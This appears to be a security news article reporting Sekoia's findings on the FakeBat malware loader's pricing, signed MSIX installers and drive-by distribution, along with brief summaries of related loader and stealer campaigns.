The loader-as-a-service (LaaS) known as FakeBat has emerged as one of the most prevalent families of loader malware distributed via drive-by download methods this year, according to findings by Sekoia.
Sekoia’s analysis, released on Tuesday, highlights that FakeBat primarily functions to download and execute subsequent-stage payloads like IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif.
Drive-by attacks utilize techniques such as search engine optimization (SEO) poisoning, malvertising, and the injection of malicious code into compromised websites. These methods aim to lure users into downloading counterfeit software installers or fake browser updates.
The rise of malware loaders in recent years corresponds with the increasing use of landing pages that mimic legitimate software sites, presenting themselves as authentic installers. This trend underscores the continued effectiveness of phishing and social engineering as primary methods for initial access by threat actors.
Known also as EugenLoader and PaykLoader, FakeBat has been marketed to other cybercriminals under a subscription model within underground forums by a Russian-speaking threat actor known as Eugenfest (also referred to as Payk_34) since at least December 2022.
The loader is engineered to evade security measures and offers clients the ability to customize builds using templates to disguise legitimate software, as well as monitor installations over time through an administrative interface.
While earlier versions employed MSI format for malware builds, recent iterations from September 2023 onwards have transitioned to MSIX format and added a digital signature to the installer with a valid certificate to evade Microsoft SmartScreen protections.
Pricing for FakeBat is structured at $1,000 weekly and $2,500 monthly for MSI format, $1,500 weekly and $4,000 monthly for MSIX format, and $1,800 weekly and $5,000 monthly for the combined MSI and signature package.
Sekoia identified various activity clusters involved in spreading FakeBat through three main avenues: impersonating popular software via malicious Google advertisements, distributing fake web browser updates through compromised sites, and employing social engineering tactics on social networks. These activities are linked to campaigns likely orchestrated by groups such as FIN7, Nitrogen, and BATLOADER.
Sekoia’s statement reveals that FakeBat command-and-control servers are likely configured to filter traffic based on characteristics such as User-Agent values, IP addresses, and geographic locations, enabling targeted distribution of the malware.
In related developments, AhnLab Security Intelligence Center (ASEC) reported on a malware campaign propagating another loader named DBatLoader (also known as ModiLoader and NatsoLoader) through phishing emails themed around invoices.
The discovery follows findings of infection chains that deliver Hijack Loader (aka DOILoader and IDAT Loader) via websites offering pirated movie downloads, ultimately deploying the Lumma information stealer.
Researcher Dave Truman from Kroll detailed the complexity of the IDATLOADER campaign, which employs multiple layers of code-based obfuscation and innovative methods to conceal malicious code, including the use of Microsoft’s mshta.exe to execute code hidden within a file masquerading as a PGP Secret Key.
Further phishing campaigns have been observed distributing Remcos RAT, with a new Eastern European threat actor identified as Unfurling Hemlock leveraging loaders and emails to disseminate binary files that act as a “cluster bomb,” spreading various malware strains simultaneously.
Outpost24 researcher Hector Garcia noted that these campaigns predominantly distribute stealers such as RedLine, RisePro, and Mystic Stealer, alongside loaders like Amadey and SmokeLoader. Initial stages typically involve emails sent to different organizations or downloads from external sites linked to external loaders.